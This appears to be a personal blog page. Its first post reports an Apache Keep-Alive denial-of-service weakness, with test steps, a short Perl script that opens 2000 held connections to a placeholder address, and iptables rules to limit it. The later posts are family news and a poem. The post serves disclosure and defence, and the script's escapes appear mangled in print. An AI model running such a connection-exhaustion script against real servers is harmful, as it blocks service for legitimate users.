The Apache Keep-Alive Tarpit Exploit

I have found a denial of service (DOS) exploit problem with the Keep-Alive setting in Apache version two. This may exist in other version as well.

What I’ve found is, with Keep-Alive off, Apache will continue to serve content. While, with Keep-Alive on a simple script can use up every connection on a server and block other users.

Here is the test I used.

1) turn on server-status
2) check the setting – KeepAlive on
3) and set KeepAliveTimeout to 45
4) restart Apache
5) run the script below and watch the connections
6) browser the server under attack. It should continue to work
7) un-comment the Keep-Alive line in the script and perform the test again.

The server-status module has a scoreboard block that shows the current connection states for each possible connection.

 

____K__._.__K___K__K_K___CK_WK__K_K_.C__K___K__KK__K__K_K__K_K__
_______KK__K___K_K_K__KK___KK___K____K______K_____K_______K__K_K
_KKKK__...______C_K____.__.._KK__K_K_K______K__K_K_________K_K_
__K____.KKK_KKK__K__K_K____C_____.___KK___K_W____K__KKK___K_K___
_KK________K____K__K_____.___K___._KK___K___KK__K________K_K_KK_

Scoreboard Key:
"_" Waiting for Connection, "S" Starting up, "R" Reading Request,
"W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup,
"C" Closing connection, "L" Logging, "G" Gracefully finishing,
"I" Idle cleanup of worker, "." Open slot with no current process

I found with Keep-Alive off, this connections block shows all ‘W’s and the server continues to serve content. I think Apache closes the oldest connection for the new requests. With Keep-Alive on, each connection opened is dedicated to the user that opened it.

So Keep-Alive can be used as a very effective denial of service attack, especially if the Apache KeepAliveTimeout setting high. The default KeepAliveTimeout is five (5) seconds. I have worked on systems were this number is set to as high as 45 seconds.

My proof of concept script tries to open 2000 tcp connections to YOUR.IP.GOES.HERE and then sleeps for sixty seconds.

Here is the script I used.

 

#!/usr/bin/perl
use IO::Socket;
$a = 2000;
$sock[$a] = 0;
while ($a > 0) {
    $sock[$a] = new IO::Socket::INET (
        PeerAddr => 'YOUR.IP.GOES.HERE',
        PeerPort => '80',
        Proto => 'tcp',
        ); die "Could not create socket: $!n" unless         $sock[$a];
    my $sck = $sock[$a];
    print $sck "GET / HTTP/1.0n";
#    print $sck "Connection: Keep-Aliven";
    print $sck "n";
    $a–;
}
sleep 60;

If you are using SSL turn off Keep-Alive may be very painfull. With out Keep-Alive SSL sessions get negocated much more often.

One way to limit this attact is to use a firewall and limit the number of new TCP sessions can be opened from a single IP.

With Linux IPTABLES the rules look like this:

 

iptables -A INPUT -i eth0 -p tcp --dport 80 -m state --state NEW -m recent --set
iptables -A INPUT -i eth0 -p tcp --dport 80 -m state --state NEW -m
recent --update --seconds 4 --hitcount 8 -j DROP

I hope someone can show where I've gone wrong here.

Welcome European Union

If you reached here through www.grennan.eu WELCOME!

I have registered my name in the European Union for my friends.

If your last name is Grennan and you would like email at grennan.eu just email me at mark@grennan.com and I’ll give you your own email address. I can either create a forward for you, or I can give you a mail box at www.grennan.com/webmail.

People use to say the Internet would isolate people. I don’t believe it. I’m much closer to my family and friends. I have also made many friends all around the world. I hope someday to find my distant relatives.

P.S. I’d like to thank Javan (Nathan’s Friend) again for helping register the domain.

Nathan moves to Silicon Valley

Suturday July 1st (2006) is Apple‘s 30th Anniversary. Happy birthday Apple.

So, this is also my 30th year in the computer business.  Thirty years ago I was working for KA Electronics in Dallas Texas as a stock boy and I was going to Devry learning electronics. I remember reading Popular Electronics and wishing I had the money to order an Apple 1. Later it was my work with the Apple II that launched my carrier in computers.

Billeo

 Now, thirty years latter, on this date, Nathan (my son) has moved to Cupertino CA, the Hollywood of the computer industry, to start a new job at Billeo as their lead Internet tech.

 Friday was Nathan’s last day at ??? where he did lots of Internet systems work and customer support. Friday night Nathan and I moved Okcforum.org from his apartment to a system he rents on the internet.

Saturday, he packed up all his stuff in a U-Haul, closed all his accounts and services in Reno NV and drove over the mountians to Silicon Valley. Most of the time he makes this drive it is snowing on the passes.  On this trip it only rained.  As a matter of fact, he had rain for the packing, driving and unpacking. Saturday night he stayed in a hotel.

 Sunday he went apartment shopping. He says the hunting process was hard.  Most apartments would not let him move in that day because they required the “corporate offices” to do a credit search and that couldn’t happen untill Monday.  Late Sunday he found Oak Pointe apartments and they had no problems.  They could do all the approvals over the Internet. (Imagine that!)

 He is now moved into a two bedroom, two bath apartment. (pictures coming) 

 Now its Monday morning. This is his first day at the new job. A full generation after the personal computer indestry began.

UPDATE: 04/04/06 – Monday was not Nathan’s first day at work.  Today is. His boss helped him move in on Sunday but the work didn’t get completely done. So he was given the day off Monday to complete the move in process.  

 He did get a cell phone on Monday and returned the U-Hall. Today at 3:00 his Internet and cabel should be connected.  We are still waitting for pictures.

 


Iva’s Poems – Page 4

This poem was writen my Iva for Fother's day.

 

Ever Lasting Love

On Father's day, I send no card,
I left my face toards my Loard.
Then I talk to Him, and Daddy too,
God called him home and left me blue.
Tho time has passed since he went away,
I miss him more and more each day.

His guiding had was so much help,
I follow his foot prints step-by-step.
When I grow up I want to be,
all that Dad has been to me.
His pleasant smile still gives me joy,
tho he is seperated from his job.

by Iva Ridgway